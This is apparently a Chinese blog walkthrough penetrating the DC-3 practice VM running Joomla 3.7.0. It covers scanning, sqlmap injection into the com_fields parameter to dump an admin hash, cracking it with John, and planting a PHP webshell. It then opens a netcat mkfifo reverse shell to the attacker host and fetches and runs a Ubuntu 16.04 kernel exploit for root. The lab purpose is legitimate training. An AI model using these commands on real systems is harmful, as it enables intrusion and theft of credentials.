【CyberSecurityLearning 72】DC系列之DC-3渗透测试(Joomla)
目录
DC-3靶机渗透测试
一、实验环境
二、渗透过程演示
1、信息搜集
2、SQL注入
3、登录后台
4、反弹shell
5、提权
总结:
DC-3靶机渗透测试
DC-3也是一个黑盒测试,我们所能知道的只有它的MAC地址,我们可以根据它的MAC地址来确定IP地址
一、实验环境
实验环境:
kali2021:192.168.3.155/24(桥接到vmnet0)
靶机环境DC-3(桥接到vmnet0,MAC地址:00:0C:29:2C:47:A4)
保证kali和DC-3在同一个网段
二、渗透过程演示
1、信息搜集
①搜集IP和端口
利用nmap或者是netdiscover
使用命令:netdiscover或者 netdiscover -r 192.168.3.0/24或者nmap -sP 192.168.3.1/24 -o nmap.sP,得知DC-3的IP地址为192.168.3.159
接下来对DC-3做端口扫描
nmap -A 192.168.3.159 -p 1-65535 -oN nmap.A 发现仅开放了80端口
访问192.168.3.159这个网页,如下图所示
我们发现好像不太能够确定网站究竟使用的是什么,我们对网站做指纹识别,做指纹识别的时候我们用whatweb命令。
whatweb -h查看命令用法
网站指纹识别工具Whatweb的使用:
命令:whatweb http://192.168.3.159,发现是Joomla,开源的内容管理系统
国外三大开源的PHP CMS :
1、drupal
2、wordpress site
3、joomla发现是joomla,这个就可以使用网站针对这个cms的扫描器Joomscan,kali默认是没有安装的,需要自己手动安装
joomscan专门扫描joomla
②joomscan安装和使用
Joomscan安装
git clone https://github.com/rezasp/joomscan.git
或者apt install joonscan(√)
使用方法
joomscan --url http://192.168.3.159
上面那些目录都是可以看的
得到joomla对应版本以及后台地址http://192.168.3.159/administrator/,看看能不能得到网站后台的账密,做爆破(这是绝招,不到万不得已不建议用)
2、SQL注入
③搜索关于joomla3.7.0有没有漏洞(exploitdb查找对应exp)
在kali自带的exploitdb中查找对应版本的joomla漏洞
searchsploit joomla 3.7.0 发现了有SQL注入漏洞
接下来把这个文件复制到当前路径下:cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomlav370_sqli.txt
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
执行前把地址改一下:localhost改为192.168.3.159
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
--dbs是列出当前服务器中的mysql数据库中都有哪些库名:
爆库名:--dbs
、
列出当前数据库的名字:--current-db
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]
爆表:-D "joomladb" --tables
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
查询列、字段:-D "joomladb" -T "#__users" --columns
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
给个路径写1,线程写10
列目录(name,password):-C指定字段 -C "name,password" --dump
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
name | password
+---------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
使用John解密
著名密码破解利器John the Ripper
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
将上述密文写到一个文件里面:vim joomla_v370_admin_hash.txt
john joomla_v370_admin_hash.txt 解出密码:snoopy
3、登录后台
admin | snoopy 成功登陆后台
登录进后台,发现可以修改网页源代码
这个地方如果可以修改PHP文件的话,那就可以直接写一个PHP大马/小马,要找到路径,根据joomla网站特点,一般在/templates下
在template栏中发现可以写文件和上传文件。我们可以写一个小马上传上去
点击NewFile创建文件(yjh.php)
接下来打开蚁剑
右键查看虚拟终端:whoami
4、反弹shell
kali 本地监听
nc -lvvp 2333
蚁剑虚拟终端
nc -e /bin/bash 192.168.3.155 2333
-e 参数不可用
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.155 2333 >/tmp/f
反弹成功!!!
5、提权
①信息收集
cat /proc/version查看版本
cat /etc/issue查看发行版信息
发现该靶机版本为Ubuntu 16.04
②在exploitdb中查找对应版本的joomla漏洞
输入如下命令查看该版本漏洞
searchsploit Ubuntu 16.04
使用39772.txt进行提权
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt
cat ubuntu1604_shell.txt
先把exp下载到kali镜像中
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
在反弹shell 的界面测试,发现访问失败,原因是我们的电脑无法访问国外的服务器
解决方法:我们先将39772.zip 文件下载至本地,本地搭建服务器,将文件上传至服务器,
我们直接访问本地服务器下载文件即可
直接在靶机中下载容易失败。我们先下载到本地,在kali中搭建服务,并将exp压缩包上传上去
EXP资源
链接:https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g
提取码:0fkw
将下载的压缩包放到/var/www/html/文件夹下
接下来只需要在shell中输入如下命令即可将exp下载到靶机(DC-3)中
wget http://192.168.3.155/39772.zip(192.168.3.155是kali的IP,把kali上的文件下载到DC3)
之后解压该文件
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
改个密码:
总结:
1、Joomscan可针对JoomlaCMS进行扫描
2、使用kali自带exploitdb库可查询kali收集的各种exp,命令为Searchsploit 程序名称 版本
3、使用John对hash值解密
4、bash反弹shell
【CyberSecurityLearning 72】DC系列之DC-3渗透测试(Joomla)相关推荐
- 【小白渗透入门系列】P5 自动化渗透测试工具
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: P5 自动化渗 ...
- 网络安全系列-VIII: 什么是渗透测试 Penetration Test?
什么是渗透测试? 概念及流程 渗透测试: Penetration Test, 是指用黑客的方式攻击你自己或客户的IT系统,来找到其中的安全漏洞.是安全评估的一种手段,目的是为了提高系统的安全性 渗透测 ...
- 【DC系列】DC-4靶机渗透练习
1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.143 2.扫描端口,开启了80端口 nmap 192.168.225.143 -sV -sC -Pn -n -v ...
- kali渗透测试系列---信息收集
kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...
- 【CyberSecurityLearning 74】DC系列之DC-5渗透测试
目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...
- 【CyberSecurityLearning 78】DC系列之DC-9渗透测试
目录 DC-9靶机渗透测试 1.信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2. SQL注入 3.admin登录后台 4.尝试文件包含 4.1 利用 LFI 查看 /etc/knockd ...
- 【CyberSecurityLearning 77】DC系列之DC-8渗透测试(Drupal)
目录 DC-7靶机渗透测试 1.信息收集 1.1 扫描DC-8开放端口 1.2 访问WEB站点 2.渗透过程 2.1 用Sqlmap自动化工具注入 2.2 drush 命令对任意用户密码进行更改(发现 ...
- 【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
目录 DC-7靶机渗透测试 1.信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2.登录ssh 3. 提权(suid提权) 3.1 exim4提权 4.drush 命令对任意用户密码进行更改 ...
- 【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)
目录 DC-6靶机渗透测试 1.信息收集 1.1 发现DC-6的IP地址 1.2 扫描开放端口 1.3 访问web网页(添加本地DNS解析) 1.4 Wpscan扫描站点(用户名) 2.WEB渗透 2 ...
最新文章
- 2022-2028年中国XPS挤塑板行业市场全景评估及产业前景规划报告
- getsockname和getpeername
- java 怎么向串口发送指令_idea ssm项目java程序使用十六进制rxtx包向串口发送指令的方法...
- (创建模式 上)设计模式——工厂、抽象工厂 C++/Python3实现
- 计算机c盘用户,windows 7 c盘的用户文件夹users如何转移
- pythonchallenge--0
- vue slot的使用介绍
- 频谱感知1:未知确定信号的能量检测
- 辽宁省计算机考研排名,2014辽宁省大学研究生教育排行榜
- ubuntu android驱动,ubuntu中正确设置android手机驱动程序
- html中table美化,漂亮的css table样式
- 移动混合开发框架+Android原生模块化/组件化
- python自动加减法_python实现随机加减法生成器
- POST /product/:id 获取单个商品
- mac移动硬盘初始化
- iOS 设计模式 浅析MVC、MVP、MVVM
- 如何用Qt抠一个圆形头像出来
- Pandas:将excel中字符型数据转为float数值型
- 例题3-6 环状序列(Circular Sequence)
- 苹果cmsv10首涂第二十五套精简宽屏大气带后台简约模板